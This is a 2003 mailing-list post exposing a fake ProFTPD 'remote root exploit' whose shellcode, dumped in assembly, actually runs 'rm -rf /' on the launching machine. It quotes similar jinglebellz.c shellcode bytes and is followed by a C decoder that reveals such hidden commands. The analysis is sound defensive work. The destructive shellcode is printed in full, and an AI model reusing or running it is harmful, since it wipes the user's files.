Message-ID: <5.1.0.14.0.20031024213308.02c263d0@pop3.arrakis.es>
From: zeroboy at arrakis.es (zero)
Subject: ProFTPD-1.2.9rc2 remote root exploit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hmmm, let's see:
Dump of assembler code for function shellcode:
0x08049480 <shellcode+0>: xor %eax,%eax
0x08049482 <shellcode+2>: push %eax
0x08049483 <shellcode+3>: push $0x582f2066
0x08049488 <shellcode+8>: push $0x722d206d
0x0804948d <shellcode+13>: push $0x7258632d
0x08049492 <shellcode+18>: push $0x41414141
0x08049497 <shellcode+23>: push $0x41414141
0x0804949c <shellcode+28>: push $0x41414141
0x080494a1 <shellcode+33>: push $0x41414141
0x080494a6 <shellcode+38>: push $0x4368732f
0x080494ab <shellcode+43>: push $0x6e69622f // /bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
0x080494b0 <shellcode+48>: xor %eax,%eax
0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
0x080494c2 <shellcode+66>: xor %ebx,%ebx
0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
0x080494cc <shellcode+76>: xor %ebx,%ebx
0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
0x080494da <shellcode+90>: xor %ebx,%ebx
0x080494dc <shellcode+92>: mov %esp,%ebx
0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx
0x080494e2 <shellcode+98>: xor %edx,%edx
0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx
0x080494e8 <shellcode+104>: mov $0xb,%al
0x080494ea <shellcode+106>: int $0x80
0x080494ec <shellcode+108>: xor %ebx,%ebx
0x080494ee <shellcode+110>: xor %eax,%eax
0x080494f0 <shellcode+112>: inc %eax
0x080494f1 <shellcode+113>: int $0x80
0x080494f3 <shellcode+115>: add %al,(%eax)
End of assembler dump.
Let's give credit to the original c0d3rs of this shellcode. Nobody
remembers jinglebellz.c?
<snip>
/*
jinglebellz.c - local/remote exploit for mpg123
(c) 2003 GOBBLES Security seXForces
[...]
unsigned char linux_shellcode[] = /* contributed by antiNSA */
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
"\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
"\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
"\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
"\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
"\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
"\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
"\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
"\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
"\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
"\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
"\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
"\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
"\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
"\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
"\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
"\x80\x31\xdb\x31\xc0\x40\xcd\x80";
</snip>
Well well, just a nice copy paste of some of it? :pPpPpPppP
And the exact cmd is:
execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})
NOTE: In this one the ~ is changed to a nicer one, /
Have a nice turkey.
Cheerz
www.citfi.org
www.podergeek.com
**********************************
"The further backward you look, the further forward you can see" - Winston Churchill
"Access is GOD..."
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6
l9RpeQ2ZrufRkkV3dflO1dTB
=kkQd
-----END PGP SIGNATURE-----
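Added example, not part of zero's message and not code from the ProFTPD "exploit" or from jinglebellz.c: a small C program that does mechanically what the post does by hand. It replays the push/xor/mov prologue of a 32-bit Linux shellcode, rebuilds the buffer those pushes leave at %esp, and prints the NUL-separated pieces, so the command a public exploit would hand to execve can be read off before anyone runs it. The byte array is constructed here by hand-assembling the mnemonics in the gdb dump above; the instruction subset the decoder understands (push $imm32, push %eax after xor, the xor filler, mov %al,disp8(%esp)) is an assumption about how such stack strings are usually built, not a general disassembler.

```c
#include <stdio.h>
#include <string.h>

/* Constructed input: the exploit's "shellcode" function, hand-assembled from
 * the mnemonics in the gdb dump above (115 bytes). */
static const unsigned char sc[] = {
    0x31,0xc0, 0x50,                                      /* xor %eax,%eax ; push %eax */
    0x68,0x66,0x20,0x2f,0x58, 0x68,0x6d,0x20,0x2d,0x72, 0x68,0x2d,0x63,0x58,0x72,
    0x68,0x41,0x41,0x41,0x41, 0x68,0x41,0x41,0x41,0x41,
    0x68,0x41,0x41,0x41,0x41, 0x68,0x41,0x41,0x41,0x41,
    0x68,0x2f,0x73,0x68,0x43, 0x68,0x2f,0x62,0x69,0x6e,   /* ... push "/shC", "/bin" */
    0x31,0xc0, 0x88,0x44,0x24,0x07, 0x88,0x44,0x24,0x1a, 0x88,0x44,0x24,0x23,
    0x89,0x64,0x24,0x08, 0x31,0xdb, 0x8d,0x5c,0x24,0x18, 0x89,0x5c,0x24,0x0c,
    0x31,0xdb, 0x8d,0x5c,0x24,0x1b, 0x89,0x5c,0x24,0x10, 0x89,0x44,0x24,0x14,
    0x31,0xdb, 0x89,0xe3, 0x8d,0x4c,0x24,0x08, 0x31,0xd2, 0x8d,0x54,0x24,0x14,
    0xb0,0x0b, 0xcd,0x80,                                 /* mov $0xb,%al ; int $0x80 */
    0x31,0xdb, 0x31,0xc0, 0x40, 0xcd,0x80                 /* exit(0) */
};

/* xor %eax/%ecx/%edx/%ebx with itself: the only non-push filler in such prologues. */
static int is_xor_self(const unsigned char *p)
{
    return p[0] == 0x31 && (p[1] == 0xc0 || p[1] == 0xc9 || p[1] == 0xd2 || p[1] == 0xdb);
}

/* Replay the string-building prologue and rebuild the bytes left at %esp.
 * Understands push $imm32, push %eax (after xor), xor filler and
 * mov %al,disp8(%esp); stops at anything else.  Returns the buffer length,
 * 0 if nothing was pushed or the result would not fit in cap. */
size_t rebuild_stack(const unsigned char *code, size_t len,
                     unsigned char *stack, size_t cap)
{
    unsigned char words[64][4];            /* immediates in push order */
    size_t nwords = 0, i = 0, w, total;
    int eax_zero = 0;

    while (i < len && nwords < 64) {       /* phase 1: the pushes */
        if (i + 1 < len && is_xor_self(code + i)) {
            if (code[i + 1] == 0xc0) eax_zero = 1;
            i += 2;
        } else if (code[i] == 0x50 && eax_zero) {          /* push %eax (a NUL word) */
            memset(words[nwords++], 0, 4); i += 1;
        } else if (code[i] == 0x68 && i + 4 < len) {       /* push $imm32 */
            memcpy(words[nwords++], code + i + 1, 4); i += 5;
        } else break;
    }
    total = nwords * 4;
    if (total == 0 || total > cap) return 0;
    for (w = 0; w < nwords; w++)           /* the last push ends up lowest, at %esp */
        memcpy(stack + w * 4, words[nwords - 1 - w], 4);

    while (i < len) {                      /* phase 2: NUL stores into the buffer */
        if (i + 1 < len && is_xor_self(code + i)) {
            if (code[i + 1] == 0xc0) eax_zero = 1;
            i += 2;
        } else if (i + 3 < len && eax_zero && code[i] == 0x88 &&
                   code[i + 1] == 0x44 && code[i + 2] == 0x24) {
            if (code[i + 3] < total) stack[code[i + 3]] = 0; /* mov %al,disp8(%esp) */
            i += 4;
        } else break;
    }
    return total;
}

/* Print each NUL-terminated piece with its %esp offset; returns the count. */
size_t list_strings(const unsigned char *stack, size_t n, FILE *out)
{
    size_t count = 0, i = 0, start;
    while (i < n) {
        start = i;
        while (i < n && stack[i] != 0) i++;
        if (i > start) {
            count++;
            if (out) fprintf(out, "  esp+0x%02zx: \"%.*s\"\n", start,
                             (int)(i - start), (const char *)stack + start);
        }
        i++;                               /* skip the terminating NUL */
    }
    return count;
}

static unsigned char g_stack[256];

/* Rebuild the sample's stack into a static buffer; *n receives its length. */
const char *sample_stack(size_t *n)
{
    size_t total = rebuild_stack(sc, sizeof sc, g_stack, sizeof g_stack);
    if (n) *n = total;
    return (const char *)g_stack;
}
size_t sample_stack_len(void) { size_t n; sample_stack(&n); return n; }

int main(void)
{
    size_t n;
    const char *st = sample_stack(&n);
    printf("%zu bytes built on the stack:\n", n);
    list_strings((const unsigned char *)st, n, stdout);   /* /bin/sh, ...-c, rm -rf / */
    return 0;
}
```

On this sample the three pieces come out at esp+0x00, esp+0x08 and esp+0x1b, which are exactly the offsets the later `lea`/`mov` instructions load into the argv array before `int $0x80` with `%al = 0xb` (execve), so the "exploit" runs `/bin/sh -c "rm -rf /"` on the box that launches it. The jinglebellz.c tail quoted in the message decodes the same way with `~` (0x7e) where this copy has `/` (0x2f). The decoder deliberately gives up at the first instruction it does not recognise: when it returns 0 or the output looks truncated, that is the cue to load the bytes into gdb or objdump rather than trust the summary.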